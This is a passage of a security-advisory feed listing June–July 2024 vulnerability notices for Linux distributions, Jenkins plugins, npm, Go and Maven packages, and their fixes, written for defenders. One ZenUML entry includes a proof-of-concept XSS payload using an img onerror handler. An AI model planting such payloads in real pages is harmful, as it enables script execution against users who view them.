"expr=%{REQUEST_URI} =~ m#^/server/api/core/bitstreams/./content$#" ```### ReferencesDiscovered and reported by Muhammad Zeeshan ([Xib3rR4dAr](https://github.com/Xib3rR4dAr))### For more informationIf you have any questions or comments about this advisory: Email us at [security@dspace.org](mailto:security@dspace.org)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-94CC-XJXR-PWVF
25.06.2024 19:50:16	ubuntu	[USN-6847-1] libheif vulnerabilities (high)	libheif could be made to crash if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6847-1
25.06.2024 14:07:42	ubuntu	[USN-6846-1] Ansible vulnerabilities (high)	Several security issues were fixed in Ansible.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6846-1
25.06.2024 16:57:29	almalinux	[ALSA-2024:4077] python3.11 security update (important)	python3.11 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4077
25.06.2024 17:12:03	almalinux	[ALSA-2024:4084] git security update (important)	git security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4084
25.06.2024 16:58:55	almalinux	[ALSA-2024:4078] python3.9 security update (important)	python3.9 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4078
25.06.2024 17:01:56	almalinux	[ALSA-2024:4083] git security update (important)	git security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4083
25.06.2024 03:00:00	debian	[DSA-5718-1] org-mode	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5718-1
25.06.2024 03:00:00	debian	[DSA-5719-1] emacs	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5719-1
25.06.2024 03:00:00	oraclelinux	[ELSA-2024-4077] python3.11 security update (important)	[3.11.7-1.1]- Security fix for CVE-2023-6597- Fix tests for XMLPullParser with Expat with fixed CVEResolves: RHEL-33884	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4077
25.06.2024 03:00:00	oraclelinux	[ELSA-2024-4078] python3.9 security update (important)	[3.9.18-3.1]- Security fixes for CVE-2023-6597 and CVE-2024-0450- Fix tests for XMLPullParser with Expat with fixed CVEResolves: RHEL-33887, RHEL-34287	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4078
25.06.2024 03:00:00	oraclelinux	[ELSA-2024-4083] git security update (important)	[2.43.5-1]- Update to 2.43.5- Related: RHEL-36402, RHEL-36414[2.43.4-1]- Update to 2.43.4- Resolves: RHEL-36402, RHEL-36414	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4083
25.06.2024 03:00:00	oraclelinux	[ELSA-2024-4084] git security update (important)	[2.43.5-1]- Update to 2.43.5- Related: RHEL-36399, RHEL-36411[2.43.4-1]- Update to 2.43.4- Resolves: RHEL-36399, RHEL-36411	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4084
25.06.2024 03:00:00	redhat	[RHSA-2024:4073] kpatch-patch security update (important)	This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4073
25.06.2024 03:00:00	redhat	[RHSA-2024:4077] python3.11 security update (important)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4077
25.06.2024 03:00:00	redhat	[RHSA-2024:4084] git security update (important)	Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.Security Fix(es):* git: Recursive clones RCE (CVE-2024-32002)* git: RCE while cloning local repos (CVE-2024-32004)* git: additional local RCE (CVE-2024-32465)* git: insecure hardlinks (CVE-2024-32020)* git: symlink bypass (CVE-2024-32021)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4084
25.06.2024 03:00:00	redhat	[RHSA-2024:4078] python3.9 security update (important)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597)* python: The zipfile module is vulnerable to zip-bombs leading to denial of service (CVE-2024-0450)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4078
25.06.2024 03:00:00	redhat	[RHSA-2024:4083] git security update (important)	Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.Security Fix(es):* git: Recursive clones RCE (CVE-2024-32002)* git: RCE while cloning local repos (CVE-2024-32004)* git: additional local RCE (CVE-2024-32465)* git: insecure hardlinks (CVE-2024-32020)* git: symlink bypass (CVE-2024-32021)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4083
25.06.2024 03:00:00	freebsd	[FREEBSD:2B68C86A-32D5-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes	Chrome Releases reports: This update includes 5 security fixes: [342428008] High CVE-2024-6290: Use after free in Dawn. Reported by wgslfuzz on 2024-05-23 [40942995] High CVE-2024-6291: Use after free in Swiftshader. Reported by Cassidy Kim(@cassidy6564) on 2023-11-15 [342545100] High CVE-2024-6292: Use after free in Dawn. Reported by wgslfuzz on 2024-05-24 [345993680] High CVE-2024-6293: Use after free in Dawn. Reported by wgslfuzz on 2024-06-09	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:2B68C86A-32D5-11EF-8A0F-A8A1599412C6
26.06.2024 22:45:59	ubuntu	[USN-6566-2] SQLite vulnerability (high)	SQLite could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6566-2
27.06.2024 00:56:17	npm	[NPM:GHSA-MP3G-VPM9-9VQV] @fastly/js-compute has a use-after-free in some host call implementations (moderate)	### ImpactThe implementation of the following functions were determined to include a use-after-free bug:* `FetchEvent.client.tlsCipherOpensslName`* `FetchEvent.client.tlsProtocol`* `FetchEvent.client.tlsClientCertificate`* `FetchEvent.client.tlsJA3MD5`* `FetchEvent.client.tlsClientHello`* `CacheEntry.prototype.userMetadata` of the `fastly:cache` subsystem* `Device.lookup` of the `fastly:device` subsystemThis bug could allow for an unintended data leak if the result of the preceding functions were sent anywhere else, and often results in a Compute service crash causing an HTTP 500 error to be returned. As all requests to Compute are isolated from one another, the only data at risk is data present for a single request.### PatchesThis bug has been fixed in version 3.16.0 of the `@fastly/js-compute` package.### WorkaroundsThere are no workarounds for this bug, any use of the affected functions introduces the possibility of a data leak or crash in guest code.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MP3G-VPM9-9VQV
27.06.2024 00:56:15	npm	[NPM:GHSA-Q6XV-JM4V-349H] Cross-site Scripting in ZenUML (moderate)	### SummaryMarkdown-based comments in the ZenUML diagram syntax are susceptible to Cross-site Scripting (XSS).### DetailsThe comment feature allows the user to attach small notes for reference. This feature allows the user to enter in their comment in markdown comment, allowing them to use common markdown features, such as `` for bolded text. However, the markdown text is currently not sanitized before rendering, allowing an attacker to enter a malicious payload for the comment which leads to XSS.https://github.com/mermaid-js/zenuml-core/blob/dcfee8cde42673c09e19401f43ad8506658c8442/src/components/DiagramFrame/SeqDiagram/MessageLayer/Block/Statement/Comment/Comment.vue#L65### PoC```// p<img onerror=alert(1) src=""/>A->B:hi```Above is a POC diagram payload that results in an XSS.Here is a similar POC in mermaid.live: https://mermaid.live/edit#pako:eNpNjrFuwyAQhl8F3dRK1DaQGhs1kVq1Y6duFQsylwTVgEWw1MTyuxc5S7df39399y0wRIug4IZh9qMOdU2mF-dPJAZMKaa9GTHlB_ZILmnYa9BQH3R4fTq8qbMDCh6TN86WhkUHQjTkM3rUoEq0Jv2Ui7CWPTPn-HUNA6icZqQwT9ZkfHfmlIwHdTTjpVC0Lsf0eVfazChMJoBa4BdUL6uGC8n7TrCGd5zCFRRnXbVjvBVNK3gJXbtSuMVYSlnFC-Kyf961UshWbmXf2-y_xcf29c7WP2yrVC0### ImpactThis puts existing applications that use ZenUML unsandboxed** at risk of arbitrary JavaScript execution when rendering user-controlled diagrams.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-Q6XV-JM4V-349H
26.06.2024 23:00:06	maven	[MAVEN:GHSA-X8MF-JCMF-R79F] Bitbucket OAuth access token exposed in the build log by Bitbucket Branch Source Plugin (moderate)	Bitbucket Branch Source Plugin 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.Bitbucket Branch Source Plugin 887.va_d359b_3d2d8d does not include the Bitbucket OAuth access token as part of the Bitbucket URL in the build log.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X8MF-JCMF-R79F
26.06.2024 23:07:12	maven	[MAVEN:GHSA-3CPQ-RW36-CPPV] Secret file credentials stored unencrypted in rare cases by Plain Credentials Plugin (moderate)	When creating secret file credentials Plain Credentials Plugin 182.v468b_97b_9dcb_8 and earlier attempts to decrypt the content of the file to check if it constitutes a valid encrypted secret. In rare cases the file content matches the expected format of an encrypted secret, and the file content will be stored unencrypted (only Base64 encoded) on the Jenkins controller file system.These credentials can be viewed by users with access to the Jenkins controller file system (global credentials) or with Item/Extended Read permission (folder-scoped credentials).Plain Credentials Plugin 183.va_de8f1dd5a_2b_ no longer attempts to decrypt the content of the file when creating secret file credentials.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3CPQ-RW36-CPPV
26.06.2024 23:03:46	maven	[MAVEN:GHSA-XFX3-CR74-X3CV] Exposure of secrets through system log in Jenkins Structs Plugin (low)	Structs Plugin provides utility functionality used, e.g., in Pipeline to instantiate and configure build steps, typically before their execution.When Structs Plugin 337.v1b_04ea_4df7c8 and earlier fails to configure a build step, it logs a warning message containing diagnostic information that may contain secrets passed as step parameters.This can result in accidental exposure of secrets through the default system log.Structs Plugin 338.v848422169819 inspects the types of actual parameters before logging these warning messages, and limits detailed diagnostic information to FINE level log messages if secrets are involved. These log messages are not displayed in the default Jenkins system log.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XFX3-CR74-X3CV
26.06.2024 16:45:31	ubuntu	[USN-6851-1] Netplan vulnerabilities (medium)	Netplan could reveal secrets or execute commands with specially craftedconfiguration file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6851-1
26.06.2024 16:01:54	ubuntu	[USN-6819-4] Linux kernel (Oracle) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6819-4
26.06.2024 15:27:29	ubuntu	[USN-6853-1] Ruby vulnerability	Ruby could be made to crash or expose sensitive information login if itprocessed certain strings.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6853-1
26.06.2024 15:20:33	ubuntu	[USN-6852-1] Wget vulnerability	Wget could be made to connect to a different host than expected.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6852-1
26.06.2024 15:12:09	ubuntu	[USN-6843-1] Plasma Workspace vulnerability	plasma-workspace would allow unintended access to the session manager.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6843-1
26.06.2024 04:06:38	ubuntu	[USN-6850-1] OpenVPN vulnerability (critical)	OpenVPN could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6850-1
26.06.2024 03:00:00	cisa	[CISA-2024:0626] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0626
26.06.2024 03:00:00	cpan	[CPANSA-Mojo-DOM-Role-Analyzer-2024-38526] Mojo-DOM-Role-Analyzer vulnerability (high)	pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1.	https://secdb.nttzen.cloud/security-advisory/cpan/CPANSA-Mojo-DOM-Role-Analyzer-2024-38526
26.06.2024 03:00:00	cpan	[CPANSA-Mojolicious-Plugin-LazyImage-2024-38526] Mojolicious-Plugin-LazyImage vulnerability (high)	pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1.	https://secdb.nttzen.cloud/security-advisory/cpan/CPANSA-Mojolicious-Plugin-LazyImage-2024-38526
26.06.2024 03:00:00	debian	[DSA-5721-1] ffmpeg (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5721-1
26.06.2024 03:00:00	debian	[DSA-5722-1] libvpx	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5722-1
26.06.2024 03:00:00	jenkins	[JENKINS:SECURITY-3363] Bitbucket OAuth access token exposed in the build log by `cloudbees-bitbucket-branch-source` (medium)	`cloudbees-bitbucket-branch-source` 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.`cloudbees-bitbucket-branch-source` 887.va_d359b_3d2d8d does not include the Bitbucket OAuth access token as part of the Bitbucket URL in the build log.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3363
26.06.2024 03:00:00	jenkins	[JENKINS:SECURITY-3371] Exposure of secrets through system log in `structs` (low)	`structs` provides utility functionality used, e.g., in Pipeline to instantiate and configure build steps, typically before their execution.When `structs` 337.v1b_04ea_4df7c8 and earlier fails to configure a build step, it logs a warning message containing diagnostic information that may contain secrets passed as step parameters.This can result in accidental exposure of secrets through the default system log.`structs` 338.v848422169819 inspects the types of actual parameters before logging these warning messages, and limits detailed diagnostic information to FINE level log messages if secrets are involved.These log messages are not displayed in the default Jenkins system log.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3371
26.06.2024 03:00:00	jenkins	[JENKINS:SECURITY-2495] Secret file credentials stored unencrypted in rare cases by `plain-credentials` (medium)	When creating secret file credentials `plain-credentials` 182.v468b_97b_9dcb_8 and earlier attempts to decrypt the content of the file to check if it constitutes a valid encrypted secret.In rare cases the file content matches the expected format of an encrypted secret, and the file content will be stored unencrypted (only Base64 encoded) on the Jenkins controller file system.These credentials can be viewed by users with access to the Jenkins controller file system (global credentials) or with Item/Extended Read permission (folder-scoped credentials).NOTE: Secret file credentials stored unencrypted are unusable, as they would be decrypted during their use.Any successfully used secret file credentials are therefore unaffected.`plain-credentials` 183.va_de8f1dd5a_2b_ no longer attempts to decrypt the content of the file when creating secret file credentials.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-2495
26.06.2024 17:13:16	rustsec	[RUSTSEC-2024-0345] Low severity (DoS) vulnerability in sequoia-openpgp	There is a denial-of-service vulnerability in sequoia-openpgp, ourcrate providing a low-level interface to our OpenPGP implementation.When triggered, the process will enter an infinite loop.Many thanks to Andrew Gallagher for disclosing the issue to us.## ImpactAny software directly or indirectly using the interface`sequoia_openpgp::cert::raw::RawCertParser`. Notably, this includes allsoftware using the `sequoia_cert_store` crate.## DetailsThe `RawCertParser` does not advance the input stream whenencountering unsupported cert (primary key) versions, resulting in aninfinite loop.The fix introduces a new raw-cert-specific`cert::raw::Error::UnuspportedCert`.## Affected software- sequoia-openpgp 1.13.0- sequoia-openpgp 1.14.0- sequoia-openpgp 1.15.0- sequoia-openpgp 1.16.0- sequoia-openpgp 1.17.0- sequoia-openpgp 1.18.0- sequoia-openpgp 1.19.0- sequoia-openpgp 1.20.0- Any software built against a vulnerable version of sequoia-openpgp which is directly or indirectly using the interface sequoia_`openpgp::cert::raw::RawCertParser`. Notably, this includes all software using the `sequoia_cert_store` crate.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0345
26.06.2024 23:54:44	go	[GO-2024-2937] Panic when parsing invalid palette-color images in golang.org/x/image	Parsing a corrupt or malicious image with invalid color indices can cause apanic.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2937
27.06.2024 18:52:04	ubuntu	[USN-5615-3] SQLite vulnerability (high)	SQLite could be made to crash or execute arbitrary code.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-5615-3
27.06.2024 13:48:19	ubuntu	[USN-6857-1] Squid vulnerabilities (high)	Several security issues were fixed in Squid.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6857-1
27.06.2024 13:42:13	ubuntu	[USN-6852-2] Wget vulnerability	Wget could be made to connect to a different host than expected.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6852-2
27.06.2024 12:52:34	ubuntu	[USN-6856-1] FontForge vulnerabilities	Several security issues were fixed in FontForge.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6856-1
27.06.2024 10:22:53	ubuntu	[USN-6855-1] libcdio vulnerability	libcdio could be made to crash or run programs as your login if itopened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6855-1
27.06.2024 10:15:54	alpinelinux	[ALPINE:CVE-2024-22232] salt vulnerability (high)	[From CVE-2024-22232] A specially crafted url can be created which leads to a directory traversal in the salt file server.A malicious user can read an arbitrary file from a Salt master’s filesystem.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-22232
27.06.2024 10:15:52	alpinelinux	[ALPINE:CVE-2024-22231] salt vulnerability (medium)	[From CVE-2024-22231] Syndic cache directory creation is vulnerable to a directory traversal attack in salt project which can lead a malicious attacker to create an arbitrary directory on a Salt master.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-22231
27.06.2024 07:10:47	go	[GO-2023-2331] Denial of service ingo.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc (high)	The grpc Unary Server Interceptor created by the otelgrpc package added thelabels net.peer.sock.addr and net.peer.sock.port with unbounded cardinality.This can lead to the server's potential memory exhaustion when many maliciousrequests are sent. This leads to a denial-of-service.	https://secdb.nttzen.cloud/security-advisory/go/GO-2023-2331
27.06.2024 06:05:54	ubuntu	[USN-6854-1] OpenSSL vulnerability (high)	OpenSSL could be made to consume resources and cause long delays if it processedcertain input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6854-1
27.06.2024 23:01:45	almalinux	[ALSA-2024:4165] pki-core security update (important)	pki-core security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4165
27.06.2024 03:00:00	debian	[DSA-5723-1] plasma-workspace	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5723-1
27.06.2024 03:00:00	oraclelinux	[ELSA-2024-4165] pki-core security update (important)	[11.5.0-2.0.1]- Replaced upstream graphical references [Orabug: 33952704][11.5.0-2]- RHEL-9916 CVE-2023-4727 pki-core: dogtag ca: token authentication bypass vulnerability	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4165
27.06.2024 03:00:00	redhat	[RHSA-2024:4160] java-1.8.0-ibm security update (moderate)	IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.Security Fix(es):* IBM JDK: Object Request Broker (ORB) denial of service (CVE-2023-38264)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4160
27.06.2024 03:00:00	redhat	[RHSA-2024:4165] pki-core security update (important)	The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* dogtag ca: token authentication bypass vulnerability (CVE-2023-4727)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4165
27.06.2024 03:00:00	vmware	[OMSA-2024-0001] VMware Workspace One UEM update addresses an information exposure vulnerability (CVE-2024-22260) (moderate)		https://secdb.nttzen.cloud/security-advisory/vmware/OMSA-2024-0001
27.06.2024 03:00:00	freebsd	[FREEBSD:589DE937-343F-11EF-8A7B-001B217B3468] Gitlab -- Vulnerabilities (critical)	Gitlab reports: Run pipelines as any user Stored XSS injected in imported project's commit notes CSRF on GraphQL API IntrospectionQuery Remove search results from public projects with unauthorized repos Cross window forgery in user application OAuth flow Project maintainers can bypass group's merge request approval policy ReDoS via custom built markdown page Private job artifacts can be accessed by any user Security fixes for banzai pipeline ReDoS in dependency linker Denial of service using a crafted OpenAPI file Merge request title disclosure Access issues and epics without having an SSO session Non project member can promote key results to objectives	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:589DE937-343F-11EF-8A7B-001B217B3468
27.06.2024 15:08:11	rustsec	[RUSTSEC-2024-0345] Low severity (DoS) vulnerability in sequoia-openpgp	There is a denial-of-service vulnerability in sequoia-openpgp, ourcrate providing a low-level interface to our OpenPGP implementation.When triggered, the process will enter an infinite loop.Many thanks to Andrew Gallagher for disclosing the issue to us.## ImpactAny software directly or indirectly using the interface`sequoia_openpgp::cert::raw::RawCertParser`. Notably, this includes allsoftware using the `sequoia_cert_store` crate.## DetailsThe `RawCertParser` does not advance the input stream whenencountering unsupported cert (primary key) versions, resulting in aninfinite loop.The fix introduces a new raw-cert-specific`cert::raw::Error::UnuspportedCert`.## Affected software- sequoia-openpgp 1.13.0- sequoia-openpgp 1.14.0- sequoia-openpgp 1.15.0- sequoia-openpgp 1.16.0- sequoia-openpgp 1.17.0- sequoia-openpgp 1.18.0- sequoia-openpgp 1.19.0- sequoia-openpgp 1.20.0- Any software built against a vulnerable version of sequoia-openpgp which is directly or indirectly using the interface `sequoia_openpgp::cert::raw::RawCertParser`. Notably, this includes all software using the `sequoia_cert_store` crate.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0345
29.06.2024 00:15:02	alpinelinux	[ALPINE:CVE-2024-29040] tpm2-tss vulnerability (medium)	[From CVE-2024-29040] This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure `TPMS_ATTEST`. For the field `TPM2_GENERATED magic` of this structure any number can be used in the JSON structure. The verifier can receive a state which does not represent the actual, possibly malicious state of the device under test. The malicious device might get access to data it shouldn't, or can use services it shouldn't be able to. This issue has been patched in version 4.1.0.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-29040
28.06.2024 22:14:48	ubuntu	[USN-6851-2] Netplan regression	USN-6851-1 caused systemctl enable to fail	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6851-2
28.06.2024 19:08:04	ubuntu	[USN-6844-2] CUPS regression	USN-6844-1 caused the cupsd daemon to never start	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6844-2
28.06.2024 06:00:12	ubuntu	[USN-6855-1] libcdio vulnerability	libcdio could be made to crash or run programs as your login if itopened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6855-1
29.06.2024 02:15:11	alpinelinux	[ALPINE:CVE-2024-37371] krb5 vulnerability	[From CVE-2024-37371] In MIT Kerberos 5 (aka krb5) before 1.21.3, an attacker can cause invalid memory reads during GSS message token handling by sending message tokens with invalid length fields.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-37371
29.06.2024 01:15:02	alpinelinux	[ALPINE:CVE-2024-37370] krb5 vulnerability	[From CVE-2024-37370] In MIT Kerberos 5 (aka krb5) before 1.21.3, an attacker can modify the plaintext Extra Count field of a confidential GSS krb5 wrap token, causing the unwrapped token to appear truncated to the application.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-37370
01.07.2024 23:34:51	maven	[MAVEN:GHSA-6JJ6-GM7P-FCVV] Remote Code Execution (RCE) vulnerability in geoserver (critical)	### SummaryMultiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.### DetailsThe GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to ALL GeoServer instances.### PoCNo public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.### ImpactThis vulnerability can lead to executing arbitrary code.### WorkaroundA workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed by an extension you are using:Mitigation for `geoserver.war` deploy:1. Stop the application server2. Unzip `geoserver.war` into a directory3. Locate the file `WEB-INF/lib/gt-complex-x.y.jar` and remove4. Zip the directory into a new `geoserver.war`5. Restart the application serverMitigation for GeoServer binary:1. Stop Jetty2. Locate the file `webapps/geoserver/WEB-INF/lib/gt-complex-x.y.jar` and remove3. Restart JettyThe following extensions and community modules are known to have a direct dependency on `gt-complex` jar and are not expected function properly without it. This is not comprehensive list and additional GeoServer functionality may be dependent on the availability of `gt-complex` jar:* Extensions: Application Schema, Catalog Services for the Web, MongoDB Data Store* Community Modules: Features-Templating, OGC API Modules, Smart Data Loader, SOLR Data StorePatch available for prior releases:1. Patched `gt-app-schema`, `gt-complex` and `gt-xsd-core` jars may be downloaded from the release page for GeoServer: 2.25.1, 2.24.3, 2.24.2, 2.23.2, 2.21.5, 2.20.7, 2.20.4, 2.19.2, 2.18.0.2. To use follow the instructions above to locate `WEB-INF/lib` folder3. Replace `gt-app-schema`, `gt-complex` and `gt-xsd-core` jars with those supplied by the patch### Referenceshttps://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8whttps://osgeo-org.atlassian.net/browse/GEOT-7587https://github.com/geotools/geotools/pull/4797https://github.com/Warxim/CVE-2022-41852?tab=readme-ov-file#workaround-for-cve-2022-41852	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6JJ6-GM7P-FCVV
01.07.2024 23:33:14	go	[GO-2024-2912] Docker CLI leaks private registry credentials to registry-1.docker.io in github.com/docker/cli (high)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2912
01.07.2024 23:33:14	go	[GO-2024-2918] Azure Identity Libraries Elevation of Privilege Vulnerability in github.com/Azure/azure-sdk-for-go/sdk/azidentity (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2918
01.07.2024 23:31:12	slackware	[SSA:2024-183-01] openssh (high)	New openssh packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/openssh-9.8p1-i586-1_slack15.0.txz: Upgraded. This update fixes a security issue: Fix race condition resulting in potential remote code execution. For more information, see: https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt https://www.cve.org/CVERecord?id=CVE-2024-6387 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssh-9.8p1-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssh-9.8p1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-9.8p1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-9.8p1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:b4af120a303e9cc81f36efc530dfeb71 openssh-9.8p1-i586-1_slack15.0.txzSlackware x86_64 15.0 package:18c832397610ce2ba95fbe5bd42c0939 openssh-9.8p1-x86_64-1_slack15.0.txzSlackware -current package:c99e931319f87074cd75a6a24748919a n/openssh-9.8p1-i586-1.txzSlackware x86_64 -current package:79193544127ed638d7281552c6fcd15e n/openssh-9.8p1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg openssh-9.8p1-i586-1_slack15.0.txz`Next, restart the sshd daemon:`# sh /etc/rc.d/rc.sshd restart`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-183-01
